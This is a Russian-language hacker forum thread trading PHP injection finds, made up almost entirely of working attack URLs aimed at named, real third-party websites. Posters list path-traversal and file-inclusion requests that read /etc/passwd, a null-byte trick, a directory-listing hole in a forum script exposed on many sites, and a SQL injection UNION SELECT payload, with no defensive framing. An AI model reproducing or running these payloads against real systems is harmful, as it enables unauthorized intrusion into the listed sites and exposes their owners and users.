PHP Иньекции

PR-4
для любителей нетрадиционного метода набора текста =))

 

insfocus.com
http://www.insfocus.com/site.php?page=[inc]

 

http://lwdb.ru/index.php?part=[x3]
не пинайте раскрыть не смогла

 

Lamersha там нет инклуда

http://lwdb.ru/index.php?part=123%00

 

gibson там нет инклуда (с) blackybr

 

Code:

http://shems.h1.ru/?../../../../../../../etc/passwd

 

Да. товарищи, читайте внимательно маны и правила. тема называется php иньекция.

file_get_content, рид функции, и неполные инклуды аля https://forum.antichat.ru/showpost.php?p=613811&postcount=635 не являются таковыми. впредь буду удалять и минусовать.

 

http://www.shu.ru/index.php?link2=../../../../../../etc/passwd


У меня попутно вопрос. Ну и нашел я эти пароли а что дальше то? куда их пихать? что делать?

 

это не пароли паролей там вообще нет .
Почитай вот для начала

https://forum.antichat.ru/threadnav12123-1-10-php+Injection.html
http://forum.web-hack.ru/index.php?showtopic=33063&go=1
http://www.inattack.ru/article/478.html (Zadoxlik )

 

Вот нашел такую штуку

http://forum.wileyeurope.com/cgi-bin/dcforum/install_help.cgi
http://www.livingdonorsonline.org/cgi-bin/dcforum/install_help.cgi
http://www.sciential.net/cgi-bin/dcforum/install_help.cgi
http://www.variety.ru/cgi-bin/dcforum/install_help.cgi
http://www.dla.org/cgi-bin/dcforum/install_help.cgi
http://www.atlantadna.org/cgi-bin/dcforum/install_help.cgi
http://www.flightadventures.com/cgi-bin/dcforum/install_help.cgi
http://www.telephonyworld.com/cgi-bin/dcforum/install_help.cgi
http://bricoespacio.estilisimo.com/cgi-bin/dcforum/install_help.cgi
http://www.pursuit-performance.com.au/cgi-bin/dcforum/install_help.cgi
http://www.homeandgardensite.com/cgi-bin/dcforum/install_help.cgi
http://www.immnet.com/cgi-bin/dcforum/install_help.cgi
http://www.sciential.net/cgi-bin/dcforum/install_help.cgi
http://world-templates.com/cgi-bin/dcforum/install_help.cgi



install_help.cgi - Этот сценарий составит список содержимого директорий
в поле ввода пишите
../../../../../../../etc и получаете то что хотели
Вот еще бы файлы бы открывал цены бы ему небыло
Не ругайтесь если не туда выложил

 

HTML:

http://www.script.com.ua/dev/materials.php?id=../../../../../../../../../../../../etc/passwd

 

Code:

http://www.nxne.com/page.php?page=../../../../../../../etc/passwd

Code:

http://www.nxne.com/page.php?page=../../../../../../../etc/passwd

Code:

http://www.crashrecords.co.uk/online/page.php?xPage=../../../../../../../etc/passwd

Code:

http://www.bristolferry.com/page.php?xPage=../../../../../../../etc/passwd

Code:

http://www.famousquotes.com/page.php?page=../../../../../../../etc/passwd

Code:

http://www.ceenorm.co.uk/page.php?xPage=../../../../../../../etc/passwd

 

для любителей нетрадиционного метода набора текста
microsoft.com зареган на tucows)

tucows.com
http://tucows.com/software.html?t2=[FFF]

 

Code:

http://www.novistil.ru/index.php?option=com_zilchcatalog&task=view&id=EBLO

 

Code:

http://www.coolermaster.ru/index.php?LT=english&Language_s=2&url_place=product_class_include&files=../../../../../../../../etc/passwd

 

после просмотра фильма ал пачино пошел на сайт его смотреть нашел шотбокс. но у шотбокс аллергия на скобки пока только это смог кто дальше сможет

Code:

http://www.alpacino.in/shoutie/shouts.php?include=../../../../../etc/passwd

 

http://upload.nostra.by/search.php?action=zalupa

 

Muhacir, может это тебе согреет душу)
bobob, сорри, если ты про эту скуль
http://www.alpacino.in/index.php?mact=Album,cntnt01,default,0&cntnt01albumid=4&cntnt01pictureid=52&cntnt01returnid=9999999999'+UNION+SELECT+1,2,3,4,5,6,7,8,9/*

 

http://rusxmms.sourceforge.net/index.php?page=tis

 

Code:

http://www.clinlab-kafedra.ru/main.php?file=../../../../../../../../../../../etc/passwd
http://www.globalloan.co.kr/company/main.php?file=../../../../../../../../../../../etc/passwd
http://www.globalloan.co.kr/customer/main.php?file=../../../../../../../../../../../etc/passwd
http://chess.clustertech.com/cn/main.php?file=../../../../../../../../../../../etc/passwd
http://www.gooodworld.co.kr/main.php?file=../../../../../../../../../../../etc/passwd
http://adee.dental.tcd.ie/index.php?file=../../../../../../../../../../../etc/passwd
http://www.pjha.org/index.php?file=../../../../../../../../../../../etc/passwd
http://www.penguinadventure.com/index.php?file=../../../../../../../../../../../etc/passwd
http://www.ash.coop/downloadfile.php?file=../../../../../../../../../../../etc/passwd
http://www.tigr.org/tdb/e2k1/ath1/qpcr/downloadfile.php?file=../../../../../../../../../../../etc/passwd
http://www.bier-degustationen.ch/downloadFile.php?file=../../../../../../../../../../../etc/passwd
http://voaklabs.com/downloadFile.php?file=../../../../../../../../../../../etc/passwd
http://www.ms-ins.co.th/claim_service/downloadFile.php?file=../../../../../../../../../../../etc/passwd
http://www.bierverkostung.ch/downloadFile.php?file=../../../../../../../../../../../etc/passwd